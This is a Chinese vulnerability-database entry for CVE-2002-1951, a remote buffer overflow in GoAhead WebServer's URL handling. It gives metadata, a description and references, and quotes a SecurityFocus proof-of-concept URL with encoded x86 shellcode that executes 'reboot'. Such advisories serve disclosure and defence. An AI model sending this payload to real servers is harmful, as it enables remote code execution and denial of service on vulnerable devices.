GoAhead WebServer远程缓冲区溢出漏洞

GoAhead WebServer远程缓冲区溢出漏洞

漏洞ID 1106916 漏洞类型 边界条件错误
发布时间 2002-08-14 更新时间 2005-10-20
图片[1]-GoAhead WebServer远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-1951
图片[2]-GoAhead WebServer远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200212-411
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21707
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-411
|漏洞详情
GoAheadWebServer是美国Embedthis公司的一款小巧的嵌入式Web服务器,它支持嵌入到各种设备和应用程序中。GoAheadWebServer存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行代码指令。GoAheadWebServer对用户提交的URL请求缺少正确的处理,远程攻击者可以提交恶意特殊的URL使GoAheadWebServer处理时产生缓冲区溢出,通过覆盖内存中返回地址以WEB进程权限执行任意指令。<**>
|漏洞EXP
source: http://www.securityfocus.com/bid/5464/info

GoAhead WebServer is an Open Source embedded web server which supports Active Server Pages, embedded javascript, and SSL authentication and encryption. It is available for a variety of platforms including Microsoft Windows and Linux variant operating systems.

It has been discovered that a buffer overflow exists in GoAhead WebServer. This vulnerability could make it possible for a remote user to execute arbitrary code with the privileges of the web server process. This could lead to an attacker gaining remote access to a vulnerable host.

http://www.example.com/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8%dc%ff%ff%ffreboot
|参考资料

来源:BID
名称:5464
链接:http://www.securityfocus.com/bid/5464
来源:www.securiteam.com
链接:http://www.securiteam.com/securitynews/5MP0C1580W.html
来源:XF
名称:goahead-long-url-bo(9884)
链接:http://www.iss.net/security_center/static/9884.php
来源:NSFOCUS
名称:3325
链接:http://www.nsfocus.net/vulndb/3325

相关推荐: Internet Security Systems BlackICE Defender Cross-site Scripting Detection Evasion Weakness

Internet Security Systems BlackICE Defender Cross-site Scripting Detection Evasion Weakness 漏洞ID 1100018 漏洞类型 Input Validation Err…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享